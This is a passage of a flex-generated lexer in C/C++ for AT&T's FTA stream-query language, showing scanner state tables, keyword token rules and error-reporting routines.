99, 128, 555, 161, 126, 143, 622, 126, 65, 623,
128, 62, 161, 128, 64, 161, 624, 168, 168, 65,
99, 168, 168, 171, 171, 172, 172, 173, 173, 172,
172, 174, 174, 171, 269, 269, 270, 270, 271, 271,
272, 272, 557, 579, 626, 627, 628, 629, 630, 631,
632, 633, 635, 636, 637, 638, 639, 640, 641, 642,
171, 643, 579, 557, 645, 646, 647, 648, 649, 650,
651, 652, 653, 654, 655, 656, 657, 658, 659, 660,
663, 664, 666, 667, 668, 669, 670, 671, 672, 673,
674, 675, 676, 677, 678, 680, 681, 683, 684, 685,
686, 688, 689, 692, 694, 692, 693, 693, 693, 695,
695, 695, 696, 696, 696, 616, 615, 614, 613, 612,
611, 610, 609, 606, 605, 604, 602, 601, 600, 598,
597, 596, 595, 594, 593, 592, 591, 590, 589, 588,
587, 586, 585, 584, 583, 582, 581, 580, 578, 577,
576, 575, 574, 573, 572, 571, 570, 569, 568, 567,
566, 565, 564, 563, 562, 561, 560, 559, 558, 556,
554, 553, 552, 551, 550, 549, 548, 547, 546, 545,
543, 542, 541, 540, 539, 538, 537, 536, 535, 533,
532, 531, 530, 529, 528, 526, 525, 524, 523, 522,
521, 520, 519, 518, 516, 515, 514, 513, 512, 511,
510, 509, 508, 507, 506, 505, 504, 503, 502, 501,
500, 498, 497, 496, 495, 494, 493, 492, 491, 490,
488, 487, 486, 485, 484, 483, 482, 481, 480, 479,
478, 477, 476, 475, 474, 473, 472, 471, 470, 469,
468, 467, 466, 465, 464, 463, 462, 461, 460, 459,
458, 457, 456, 455, 454, 453, 452, 450, 449, 447,
446, 444, 443, 442, 441, 440, 439, 438, 437, 436,
435, 434, 432, 431, 429, 428, 427, 426, 423, 422,
421, 420, 419, 418, 417, 416, 415, 414, 413, 412,
411, 410, 409, 408, 407, 406, 405, 404, 403, 402,
401, 400, 399, 397, 396, 395, 393, 392, 391, 390,
389, 387, 386, 385, 384, 383, 382, 380, 379, 378,
377, 376, 374, 373, 372, 371, 370, 369, 368, 367,
366, 365, 364, 363, 362, 361, 359, 358, 357, 355,
354, 353, 352, 351, 350, 349, 348, 347, 346, 345,
344, 343, 342, 341, 340, 339, 338, 337, 336, 335,
334, 333, 332, 331, 330, 329, 328, 327, 326, 324,
322, 321, 320, 319, 317, 316, 315, 314, 313, 312,
311, 310, 309, 308, 307, 306, 305, 304, 303, 302,
301, 300, 298, 297, 296, 295, 294, 293, 292, 291,
290, 289, 288, 286, 285, 284, 283, 282, 281, 280,
278, 277, 276, 275, 274, 268, 267, 266, 265, 264,
263, 262, 261, 260, 259, 258, 257, 256, 255, 254,
253, 252, 251, 250, 249, 248, 247, 246, 245, 244,
243, 242, 241, 240, 239, 238, 237, 236, 235, 234,
233, 232, 231, 230, 228, 227, 226, 225, 224, 223,
222, 221, 220, 219, 218, 217, 216, 215, 214, 213,
211, 209, 207, 206, 205, 204, 203, 202, 201, 200,
199, 197, 196, 195, 194, 193, 191, 190, 189, 188,
187, 186, 185, 184, 183, 182, 181, 180, 179, 178,
176, 175, 169, 166, 165, 164, 163, 162, 160, 159,
158, 157, 156, 155, 154, 153, 152, 151, 150, 149,
148, 147, 146, 145, 144, 142, 141, 140, 139, 138,
137, 136, 135, 134, 133, 132, 131, 130, 129, 127,
125, 124, 123, 122, 121, 120, 119, 118, 117, 116,
115, 114, 113, 112, 111, 110, 109, 108, 107, 106,
105, 104, 103, 102, 101, 100, 98, 97, 96, 95,
94, 93, 92, 91, 90, 89, 87, 86, 85, 84,
82, 81, 78, 77, 76, 74, 67, 63, 61, 56,
52, 50, 46, 44, 43, 42, 41, 38, 34, 20,
11, 9, 5, 3, 691, 691, 691, 691, 691, 691,
691, 691, 691, 691, 691, 691, 691, 691, 691, 691,
691, 691, 691, 691, 691, 691, 691, 691, 691, 691,
691, 691, 691, 691, 691, 691, 691, 691, 691, 691,
691, 691, 691, 691, 691, 691, 691, 691, 691, 691,
691, 691, 691, 691, 691, 691, 691, 691, 691, 691,
691, 691, 691, 691, 691, 691, 691, 691, 691, 691,
691, 691, 691
} ;
static yy_state_type yy_last_accepting_state;
static char *yy_last_accepting_cpos;
extern int FtaParser_flex_debug;
int FtaParser_flex_debug = 0;
/* The intent behind this definition is that it'll catch
* any uses of REJECT which flex missed.
*/
#define REJECT reject_used_but_not_detected
static int yy_more_flag = 0;
static int yy_more_len = 0;
#define yymore() ((yy_more_flag) = 1)
#define YY_MORE_ADJ (yy_more_len)
#define YY_RESTORE_YY_MORE_OFFSET
char *FtaParsertext;
#line 1 "fta.l"
/* ------------------------------------------------
Copyright 2020 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
/*
MUST COMPILE WITH
flex -PFtaParser -oftalexer.cc fta.l
(or equivalent).
*/
#line 24 "fta.l"
/*
* AT&T lex can't handle this lexer due to lex bugs. It works with flex
* 2.3.7, pclex 2.0.5, and MKS lex 3.1a.
*/
#include "parse_fta.h"
#include "parse_schema.h"
#include <string.h>
#include "fta.tab.cc.h"
/*
Some includes that flex doesn't include as standard,
but which are needed.
*/
#include <stdlib.h>
#include <string.h>
// Prevent flex from defining FtaParserwrap as extern "C"
#define YY_SKIP_YYWRAP
/* No lex lib, supply the FtaParserwrap fcn. that normally resides there
*/
//int FtaParserwrap(){return(1);}
extern int FtaParserdebug;
/*
These variables are used for error reporting:
flex_fta_lineno : the line currently being parsed when the error occurs.
flex_fta_ch : the character on the line where the error occurs
flex_fta_linebuf : store the line for reporting.
NOTE : 1) the fixed size flex_fta_linebuf buffer is dangerous.
2) You might get pointed to a place shortly after
where the syntax error occurs. It is close enough
for now.
*/
int flex_fta_lineno = 1;
int flex_fta_ch = 0;
char flex_fta_linebuf[200000];
char *flex_fta_stringinput = NULL;
int flex_fta_stringinput_ptr = 0;
FILE *flex_fta_fileinput = NULL;
int my_FtaParser_yyinput(char *buf, int max_size);
void FtaParsererror(char *s){
int i;
fprintf(stderr,"On line %d, char %d: %s (token %s):\n%s\n",
flex_fta_lineno, flex_fta_ch, s, FtaParsertext, flex_fta_linebuf );
for(i=0;i<flex_fta_ch;i++){
if(flex_fta_linebuf[i] == '\t'){
fprintf(stderr,"\t");
}else{
fprintf(stderr," ");
}
}
fprintf(stderr,"^\n");
// fprintf(stderr,"%*s\n",1+flex_fta_ch,"^");
}
#undef YY_INPUT
#define YY_INPUT(b, r, ms) (r = my_FtaParser_yyinput(b,ms))
/* MKS needs the next line to increase the NFA table */
#line 1013 "ftalexer.cc"
#define INITIAL 0
#ifndef YY_NO_UNISTD_H
/* Special case for "unistd.h", since it is non-ANSI. We include it way
* down here because we want the user's section 1 to have been scanned first.
* The user has a chance to override it with an option.
*/
#include <unistd.h>
#endif
#ifndef YY_EXTRA_TYPE
#define YY_EXTRA_TYPE void *
#endif
static int yy_init_globals (void );
/* Accessor methods to globals.
These are made visible to non-reentrant scanners for convenience. */
int FtaParserlex_destroy (void );
int FtaParserget_debug (void );
void FtaParserset_debug (int debug_flag );
YY_EXTRA_TYPE FtaParserget_extra (void );
void FtaParserset_extra (YY_EXTRA_TYPE user_defined );
FILE *FtaParserget_in (void );
void FtaParserset_in (FILE * _in_str );
FILE *FtaParserget_out (void );
void FtaParserset_out (FILE * _out_str );
yy_size_t FtaParserget_leng (void );
char *FtaParserget_text (void );
int FtaParserget_lineno (void );
void FtaParserset_lineno (int _line_number );
/* Macros after this point can all be overridden by user definitions in
* section 1.
*/
#ifndef YY_SKIP_YYWRAP
#ifdef __cplusplus
extern "C" int FtaParserwrap (void );
#else
extern int FtaParserwrap (void );
#endif
#endif
#ifndef YY_NO_UNPUT
static void yyunput (int c,char *buf_ptr );
#endif
#ifndef yytext_ptr
static void yy_flex_strncpy (char *,yyconst char *,int );
#endif
#ifdef YY_NEED_STRLEN
static int yy_flex_strlen (yyconst char * );
#endif
#ifndef YY_NO_INPUT
#ifdef __cplusplus
static int yyinput (void );
#else
static int input (void );
#endif
#endif
/* Amount of stuff to slurp up with each read. */
#ifndef YY_READ_BUF_SIZE
#ifdef __ia64__
/* On IA-64, the buffer size is 16k, not 8k */
#define YY_READ_BUF_SIZE 16384
#else
#define YY_READ_BUF_SIZE 8192
#endif /* __ia64__ */
#endif
/* Copy whatever the last rule matched to the standard output. */
#ifndef ECHO
/* This used to be an fputs(), but since the string might contain NUL's,
* we now use fwrite().
*/
#define ECHO do { if (fwrite( FtaParsertext, FtaParserleng, 1, FtaParserout )) {} } while (0)
#endif
/* Gets input and stuffs it into "buf". number of characters read, or YY_NULL,
* is returned in "result".
*/
#ifndef YY_INPUT
#define YY_INPUT(buf,result,max_size) \
if ( YY_CURRENT_BUFFER_LVALUE->yy_is_interactive ) \
{ \
int c = '*'; \
size_t n; \
for ( n = 0; n < max_size && \
(c = getc( FtaParserin )) != EOF && c != '\n'; ++n ) \
buf[n] = (char) c; \
if ( c == '\n' ) \
buf[n++] = (char) c; \
if ( c == EOF && ferror( FtaParserin ) ) \
YY_FATAL_ERROR( "input in flex scanner failed" ); \
result = n; \
} \
else \
{ \
errno=0; \
while ( (result = fread(buf, 1, max_size, FtaParserin))==0 && ferror(FtaParserin)) \
{ \
if( errno != EINTR) \
{ \
YY_FATAL_ERROR( "input in flex scanner failed" ); \
break; \
} \
errno=0; \
clearerr(FtaParserin); \
} \
}\
\
#endif
/* No semi-colon after return; correct usage is to write "yyterminate();" -
* we don't want an extra ';' after the "return" because that will cause
* some compilers to complain about unreachable statements.
*/
#ifndef yyterminate
#define yyterminate() return YY_NULL
#endif
/* Number of entries by which start-condition stack grows. */
#ifndef YY_START_STACK_INCR
#define YY_START_STACK_INCR 25
#endif
/* Report a fatal error. */
#ifndef YY_FATAL_ERROR
#define YY_FATAL_ERROR(msg) yy_fatal_error( msg )
#endif
/* end tables serialization structures and prototypes */
/* Default declaration of generated scanner - a define so the user can
* easily add parameters.
*/
#ifndef YY_DECL
#define YY_DECL_IS_OURS 1
extern int FtaParserlex (void);
#define YY_DECL int FtaParserlex (void)
#endif /* !YY_DECL */
/* Code executed at the beginning of each rule, after FtaParsertext and FtaParserleng
* have been set up.
*/
#ifndef YY_USER_ACTION
#define YY_USER_ACTION
#endif
/* Code executed at the end of each rule. */
#ifndef YY_BREAK
#define YY_BREAK /*LINTED*/break;
#endif
#define YY_RULE_SETUP \
YY_USER_ACTION
/** The main scanner function which does all the work.
*/
YY_DECL
{
yy_state_type yy_current_state;
char *yy_cp, *yy_bp;
int yy_act;
if ( !(yy_init) )
{
(yy_init) = 1;
#ifdef YY_USER_INIT
YY_USER_INIT;
#endif
if ( ! (yy_start) )
(yy_start) = 1; /* first start state */
if ( ! FtaParserin )
FtaParserin = stdin;
if ( ! FtaParserout )
FtaParserout = stdout;
if ( ! YY_CURRENT_BUFFER ) {
FtaParserensure_buffer_stack ();
YY_CURRENT_BUFFER_LVALUE =
FtaParser_create_buffer(FtaParserin,YY_BUF_SIZE );
}
FtaParser_load_buffer_state( );
}
{
#line 104 "fta.l"
/* literal keyword tokens */
/*
The actions associated with each text token are to
keep track of the current location (for syntax error reporting)
and to report any necessary info to the emf.y parse tree builder
Its likely that there are a number of omissions, inconsistencies
(some keywords do not need to be in caps), and relics
(keywords such as BETWEEN, INDICATOR, etc., are not used
in emf.y)
This parser is somewhat of a work in progress.
*/
/* Query keywords */
#line 1250 "ftalexer.cc"
while ( /*CONSTCOND*/1 ) /* loops until end-of-file is reached */
{
(yy_more_len) = 0;
if ( (yy_more_flag) )
{
(yy_more_len) = (yy_c_buf_p) - (yytext_ptr);
(yy_more_flag) = 0;
}
yy_cp = (yy_c_buf_p);
/* Support of FtaParsertext. */
*yy_cp = (yy_hold_char);
/* yy_bp points to the position in yy_ch_buf of the start of
* the current run.
*/
yy_bp = yy_cp;
yy_current_state = (yy_start);
yy_match:
do
{
YY_CHAR yy_c = yy_ec[YY_SC_TO_UI(*yy_cp)] ;
if ( yy_accept[yy_current_state] )
{
(yy_last_accepting_state) = yy_current_state;
(yy_last_accepting_cpos) = yy_cp;
}
while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state )
{
yy_current_state = (int) yy_def[yy_current_state];
if ( yy_current_state >= 692 )
yy_c = yy_meta[(unsigned int) yy_c];
}
yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c];
++yy_cp;
}
while ( yy_base[yy_current_state] != 815 );
yy_find_action:
yy_act = yy_accept[yy_current_state];
if ( yy_act == 0 )
{ /* have to back up */
yy_cp = (yy_last_accepting_cpos);
yy_current_state = (yy_last_accepting_state);
yy_act = yy_accept[yy_current_state];
}
YY_DO_BEFORE_ACTION;
do_action: /* This label is used only to access EOF actions. */
switch ( yy_act )
{ /* beginning of action switch */
case 0: /* must back up */
/* undo the effects of YY_DO_BEFORE_ACTION */
*yy_cp = (yy_hold_char);
yy_cp = (yy_last_accepting_cpos);
yy_current_state = (yy_last_accepting_state);
goto yy_find_action;
case 1:
YY_RULE_SETUP
#line 122 "fta.l"
{ flex_fta_ch+=FtaParserleng; return AND; }
YY_BREAK
case 2:
YY_RULE_SETUP
#line 123 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("AND_AGGR"); return AGGR; }
YY_BREAK
case 3:
YY_RULE_SETUP
#line 124 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("OR_AGGR"); return AGGR; }
YY_BREAK
case 4:
YY_RULE_SETUP
#line 125 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("XOR_AGGR"); return AGGR; }
YY_BREAK
case 5:
YY_RULE_SETUP
#line 126 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("AVG"); return AGGR; }
YY_BREAK
case 6:
YY_RULE_SETUP
#line 127 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("MIN"); return AGGR; }
YY_BREAK
case 7:
YY_RULE_SETUP
#line 128 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("MAX"); return AGGR; }
YY_BREAK
case 8:
YY_RULE_SETUP
#line 129 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("SUM"); return AGGR; }
YY_BREAK
case 9:
YY_RULE_SETUP
#line 130 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("COUNT"); return AGGR; }
YY_BREAK
case 10:
YY_RULE_SETUP
#line 131 "fta.l"
{ flex_fta_ch+=FtaParserleng; return BY; }
YY_BREAK
case 11:
YY_RULE_SETUP
#line 132 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FROM; }
YY_BREAK
case 12:
YY_RULE_SETUP
#line 133 "fta.l"
{ flex_fta_ch+=FtaParserleng; return INNER_JOIN; }
YY_BREAK
case 13:
YY_RULE_SETUP
#line 134 "fta.l"
{ flex_fta_ch+=FtaParserleng; return OUTER_JOIN; }
YY_BREAK
case 14:
YY_RULE_SETUP
#line 135 "fta.l"
{ flex_fta_ch+=FtaParserleng; return RIGHT_OUTER_JOIN; }
YY_BREAK
case 15:
YY_RULE_SETUP
#line 136 "fta.l"
{ flex_fta_ch+=FtaParserleng; return LEFT_OUTER_JOIN; }
YY_BREAK
case 16:
YY_RULE_SETUP
#line 137 "fta.l"
{ flex_fta_ch+=FtaParserleng; return WATCHLIST_JOIN; }
YY_BREAK
case 17:
YY_RULE_SETUP
#line 138 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FILTER_JOIN; }
YY_BREAK
case 18:
YY_RULE_SETUP
#line 139 "fta.l"
{ flex_fta_ch+=FtaParserleng; return GROUP; }
YY_BREAK
case 19:
YY_RULE_SETUP
#line 140 "fta.l"
{ flex_fta_ch+=FtaParserleng; return ROLLUP; }
YY_BREAK
case 20:
YY_RULE_SETUP
#line 141 "fta.l"
{ flex_fta_ch+=FtaParserleng; return CUBE; }
YY_BREAK
case 21:
YY_RULE_SETUP
#line 142 "fta.l"
{ flex_fta_ch+=FtaParserleng; return GROUPING_SETS; }
YY_BREAK
case 22:
YY_RULE_SETUP
#line 143 "fta.l"
{ flex_fta_ch+=FtaParserleng; return SUPERGROUP; }
YY_BREAK
case 23:
YY_RULE_SETUP
#line 144 "fta.l"
{ flex_fta_ch+=FtaParserleng; return CLEANING_WHEN; }
YY_BREAK
case 24:
YY_RULE_SETUP
#line 145 "fta.l"
{ flex_fta_ch+=FtaParserleng; return CLEANING_BY; }
YY_BREAK
case 25:
YY_RULE_SETUP
#line 146 "fta.l"
{ flex_fta_ch+=FtaParserleng; return CLOSING_WHEN; }
YY_BREAK
case 26:
YY_RULE_SETUP
#line 147 "fta.l"
{ flex_fta_ch+=FtaParserleng; return HAVING; }
YY_BREAK
case 27:
YY_RULE_SETUP
#line 148 "fta.l"
{ flex_fta_ch+=FtaParserleng; return AS; }
YY_BREAK
case 28:
YY_RULE_SETUP
#line 149 "fta.l"
{ flex_fta_ch+=FtaParserleng; return IN; }
YY_BREAK
case 29:
YY_RULE_SETUP
#line 150 "fta.l"
{ flex_fta_ch+=FtaParserleng; return NOT; }
YY_BREAK
case 30:
YY_RULE_SETUP
#line 151 "fta.l"
{ flex_fta_ch+=FtaParserleng; return OR; }
YY_BREAK
case 31:
YY_RULE_SETUP
#line 153 "fta.l"
{ flex_fta_ch+=FtaParserleng; return SELECT; }
YY_BREAK
case 32:
YY_RULE_SETUP
#line 154 "fta.l"
{ flex_fta_ch+=FtaParserleng; return WHERE; }
YY_BREAK
case 33:
YY_RULE_SETUP
#line 155 "fta.l"
{ flex_fta_ch+=FtaParserleng; return SUCH;}
YY_BREAK
case 34:
YY_RULE_SETUP
#line 156 "fta.l"
{ flex_fta_ch+=FtaParserleng; return THAT;}
YY_BREAK
case 35:
YY_RULE_SETUP
#line 157 "fta.l"
{flex_fta_ch+=FtaParserleng; return MERGE;}
YY_BREAK
case 36:
YY_RULE_SETUP
#line 158 "fta.l"
{flex_fta_ch+=FtaParserleng; return SLACK;}
YY_BREAK
case 37:
YY_RULE_SETUP
#line 159 "fta.l"
{flex_fta_ch+=FtaParserleng; return WATCHLIST;}
YY_BREAK
case 38:
YY_RULE_SETUP
#line 161 "fta.l"
{ flex_fta_ch+=FtaParserleng; return TRUE_V;}
YY_BREAK
case 39:
YY_RULE_SETUP
#line 162 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FALSE_V;}
YY_BREAK
case 40:
YY_RULE_SETUP
#line 163 "fta.l"
{ flex_fta_ch+=FtaParserleng; return TIMEVAL_L;}
YY_BREAK
case 41:
YY_RULE_SETUP
#line 164 "fta.l"
{ flex_fta_ch+=FtaParserleng; return HEX_L;}
YY_BREAK
case 42:
YY_RULE_SETUP
#line 165 "fta.l"
{ flex_fta_ch+=FtaParserleng; return LHEX_L;}
YY_BREAK
case 43:
YY_RULE_SETUP
#line 166 "fta.l"
{ flex_fta_ch+=FtaParserleng; return IP_L;}
YY_BREAK
case 44:
YY_RULE_SETUP
#line 167 "fta.l"
{ flex_fta_ch+=FtaParserleng; return IPV6_L;}
YY_BREAK
case 45:
YY_RULE_SETUP
#line 169 "fta.l"
{ flex_fta_ch+=FtaParserleng; return DEFINE_SEC;}
YY_BREAK
case 46:
YY_RULE_SETUP
#line 170 "fta.l"
{ flex_fta_ch+=FtaParserleng; return PARAM_SEC;}
YY_BREAK
case 47:
YY_RULE_SETUP
#line 172 "fta.l"
{flex_fta_ch+=FtaParserleng; return LEFTBRACE;}
YY_BREAK
case 48:
YY_RULE_SETUP
#line 173 "fta.l"
{flex_fta_ch+=FtaParserleng; return RIGHTBRACE;}
YY_BREAK
/*
Table definition keywords
*/
case 49:
YY_RULE_SETUP
#line 178 "fta.l"
{ flex_fta_ch+=FtaParserleng; return TABLE; }
YY_BREAK
case 50:
YY_RULE_SETUP
#line 179 "fta.l"
{ flex_fta_ch+=FtaParserleng; return PROTOCOL; }
YY_BREAK
case 51:
YY_RULE_SETUP
#line 180 "fta.l"
{ flex_fta_ch+=FtaParserleng; return STREAM; }
YY_BREAK
case 52:
YY_RULE_SETUP
#line 181 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FTA; }
YY_BREAK
case 53:
YY_RULE_SETUP
#line 182 "fta.l"
{ flex_fta_ch+=FtaParserleng; return UNPACK_FCNS; }
YY_BREAK
case 54:
YY_RULE_SETUP
#line 184 "fta.l"
{ flex_fta_ch+=FtaParserleng; return OPERATOR; }
YY_BREAK
case 55:
YY_RULE_SETUP
#line 185 "fta.l"
{ flex_fta_ch+=FtaParserleng; return OPERATOR_VIEW; }
YY_BREAK
case 56:
YY_RULE_SETUP
#line 186 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FIELDS; }
YY_BREAK
case 57:
YY_RULE_SETUP
#line 187 "fta.l"
{ flex_fta_ch+=FtaParserleng; return SUBQUERIES; }
YY_BREAK
case 58:
YY_RULE_SETUP
#line 188 "fta.l"
{ flex_fta_ch+=FtaParserleng; return SELECTION_PUSHDOWN; }
YY_BREAK
case 59:
YY_RULE_SETUP
#line 189 "fta.l"
{flex_fta_ch+=FtaParserleng; return SEMICOLON;}
YY_BREAK
/* punctuation */
case 60:
#line 194 "fta.l"
case 61:
YY_RULE_SETUP
#line 194 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup(FtaParsertext); return SHIFT_OP; }
YY_BREAK
case 62:
#line 197 "fta.l"
case 63:
#line 198 "fta.l"
case 64:
#line 199 "fta.l"
case 65:
#line 200 "fta.l"
case 66:
#line 201 "fta.l"
case 67:
YY_RULE_SETUP
#line 201 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup(FtaParsertext); return COMPARISON; }
YY_BREAK
case 68:
YY_RULE_SETUP
#line 203 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FtaParsertext[0]; }
YY_BREAK
case 69:
YY_RULE_SETUP
#line 204 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FtaParsertext[0]; }
YY_BREAK
case 70:
YY_RULE_SETUP
#line 205 "fta.l"
{ flex_fta_ch+=FtaParserleng; return FtaParsertext[0]; }
YY_BREAK
/* names */
case 71:
YY_RULE_SETUP
#line 209 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup(FtaParsertext); return NAME; }
YY_BREAK
/* numbers */
case 72:
#line 214 "fta.l"
case 73:
YY_RULE_SETUP
#line 214 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup(FtaParsertext); return INTNUM; }
YY_BREAK
case 74:
YY_RULE_SETUP
#line 216 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup(FtaParsertext); return LONGINTNUM; }
YY_BREAK
case 75:
#line 219 "fta.l"
case 76:
#line 220 "fta.l"
case 77:
#line 221 "fta.l"
case 78:
#line 222 "fta.l"
case 79:
YY_RULE_SETUP
#line 222 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup(FtaParsertext); return APPROXNUM; }
YY_BREAK
/* strings */
case 80:
YY_RULE_SETUP
#line 226 "fta.l"
{
int c;
FtaParserlval.strval = strdup(FtaParsertext+1);
c = yyinput();
unput(c); /* just peeking */
if(c != '\'') {
flex_fta_ch+=FtaParserleng;
FtaParserlval.strval[FtaParserleng-2] = '\0';
return STRING_TOKEN;
} else
yymore();
}
YY_BREAK
case 81:
*yy_cp = (yy_hold_char); /* undo effects of setting up FtaParsertext */
(yy_c_buf_p) = yy_cp -= 1;
YY_DO_BEFORE_ACTION; /* set up FtaParsertext again */
YY_RULE_SETUP
#line 243 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParsererror("Unterminated string"); }
YY_BREAK
/* */
/* Newline : advance the error reporting line number */
/* and grab the next line into flex_fta_linebuf */
/* */
case 82:
/* rule 82 can match eol */
YY_RULE_SETUP
#line 250 "fta.l"
{flex_fta_ch=0; flex_fta_lineno++;
strcpy(flex_fta_linebuf,FtaParsertext+1);
yyless(1);
}
YY_BREAK
case 83:
YY_RULE_SETUP
#line 255 "fta.l"
{flex_fta_ch+=FtaParserleng; } /* white space */
YY_BREAK
case 84:
*yy_cp = (yy_hold_char); /* undo effects of setting up FtaParsertext */
(yy_c_buf_p) = yy_cp -= 1;
YY_DO_BEFORE_ACTION; /* set up FtaParsertext again */
YY_RULE_SETUP
#line 257 "fta.l"
{flex_fta_ch+=FtaParserleng; }; /* comment */
YY_BREAK
case 85:
*yy_cp = (yy_hold_char); /* undo effects of setting up FtaParsertext */
(yy_c_buf_p) = yy_cp -= 1;
YY_DO_BEFORE_ACTION; /* set up FtaParsertext again */
YY_RULE_SETUP
#line 258 "fta.l"
{flex_fta_ch+=FtaParserleng; }; /* comment */
YY_BREAK
case 86:
/* rule 86 can match eol */
YY_RULE_SETUP
#line 260 "fta.l"
{flex_fta_ch+=FtaParserleng; fprintf(stderr,"Warning: unknown token (ignored)\n"); FtaParsererror(FtaParsertext);}
YY_BREAK
case 87:
YY_RULE_SETUP
#line 262 "fta.l"
ECHO;
YY_BREAK
#line 1755 "ftalexer.cc"
case YY_STATE_EOF(INITIAL):
yyterminate();
case YY_END_OF_BUFFER:
{
/* Amount of text matched not including the EOB char. */
int yy_amount_of_matched_text = (int) (yy_cp - (yytext_ptr)) - 1;
/* Undo the effects of YY_DO_BEFORE_ACTION. */
*yy_cp = (yy_hold_char);
YY_RESTORE_YY_MORE_OFFSET
if ( YY_CURRENT_BUFFER_LVALUE->yy_buffer_status == YY_BUFFER_NEW )
{
/* We're scanning a new file or input source. It's
* possible that this happened because the user
* just pointed FtaParserin at a new source and called
* FtaParserlex(). If so, then we have to assure
* consistency between YY_CURRENT_BUFFER and our
* globals. Here is the right place to do so, because
* this is the first action (other than possibly a
* back-up) that will match for the new input source.
*/
(yy_n_chars) = YY_CURRENT_BUFFER_LVALUE->yy_n_chars;
YY_CURRENT_BUFFER_LVALUE->yy_input_file = FtaParserin;
YY_CURRENT_BUFFER_LVALUE->yy_buffer_status = YY_BUFFER_NORMAL;
}
/* Note that here we test for yy_c_buf_p "<=" to the position
* of the first EOB in the buffer, since yy_c_buf_p will
* already have been incremented past the NUL character
* (since all states make transitions on EOB to the
* end-of-buffer state). Contrast this with the test
* in input().
*/
if ( (yy_c_buf_p) <= &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)] )
{ /* This was really a NUL. */
yy_state_type yy_next_state;
(yy_c_buf_p) = (yytext_ptr) + yy_amount_of_matched_text;
yy_current_state = yy_get_previous_state( );
/* Okay, we're now positioned to make the NUL
* transition. We couldn't have
* yy_get_previous_state() go ahead and do it
* for us because it doesn't know how to deal
* with the possibility of jamming (and we don't
* want to build jamming into it because then it
* will run more slowly).
*/
yy_next_state = yy_try_NUL_trans( yy_current_state );
yy_bp = (yytext_ptr) + YY_MORE_ADJ;
if ( yy_next_state )
{
/* Consume the NUL. */
yy_cp = ++(yy_c_buf_p);
yy_current_state = yy_next_state;
goto yy_match;
}
else
{
yy_cp = (yy_c_buf_p);
goto yy_find_action;
}
}
else switch ( yy_get_next_buffer( ) )
{
case EOB_ACT_END_OF_FILE:
{
(yy_did_buffer_switch_on_eof) = 0;
if ( FtaParserwrap( ) )
{
/* Note: because we've taken care in
* yy_get_next_buffer() to have set up
* FtaParsertext, we can now set up
* yy_c_buf_p so that if some total
* hoser (like flex itself) wants to
* call the scanner after we return the
* YY_NULL, it'll still work - another
* YY_NULL will get returned.
*/
(yy_c_buf_p) = (yytext_ptr) + YY_MORE_ADJ;
yy_act = YY_STATE_EOF(YY_START);
goto do_action;
}
else
{
if ( ! (yy_did_buffer_switch_on_eof) )
YY_NEW_FILE;
}
break;
}
case EOB_ACT_CONTINUE_SCAN:
(yy_c_buf_p) =
(yytext_ptr) + yy_amount_of_matched_text;
yy_current_state = yy_get_previous_state( );
yy_cp = (yy_c_buf_p);
yy_bp = (yytext_ptr) + YY_MORE_ADJ;
goto yy_match;
case EOB_ACT_LAST_MATCH:
(yy_c_buf_p) =
&YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)];
yy_current_state = yy_get_previous_state( );
yy_cp = (yy_c_buf_p);
yy_bp = (yytext_ptr) + YY_MORE_ADJ;
goto yy_find_action;
}
break;
}
default:
YY_FATAL_ERROR(
"fatal flex scanner internal error--no action found" );
} /* end of action switch */
} /* end of scanning one token */
} /* end of user's declarations */
} /* end of FtaParserlex */
/* yy_get_next_buffer - try to read in a new buffer
*
* Returns a code representing an action:
* EOB_ACT_LAST_MATCH -
* EOB_ACT_CONTINUE_SCAN - continue scanning from current position
* EOB_ACT_END_OF_FILE - end of file
*/
static int yy_get_next_buffer (void)
{
char *dest = YY_CURRENT_BUFFER_LVALUE->yy_ch_buf;
char *source = (yytext_ptr);
yy_size_t number_to_move, i;
int ret_val;
if ( (yy_c_buf_p) > &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars) + 1] )
YY_FATAL_ERROR(
"fatal flex scanner internal error--end of buffer missed" );
if ( YY_CURRENT_BUFFER_LVALUE->yy_fill_buffer == 0 )
{ /* Don't try to fill the buffer, so this is an EOF. */
if ( (yy_c_buf_p) - (yytext_ptr) - YY_MORE_ADJ == 1 )
{
/* We matched a single character, the EOB, so
* treat this as a final EOF.
*/
return EOB_ACT_END_OF_FILE;
}
else
{
/* We matched some text prior to the EOB, first
* process it.
*/
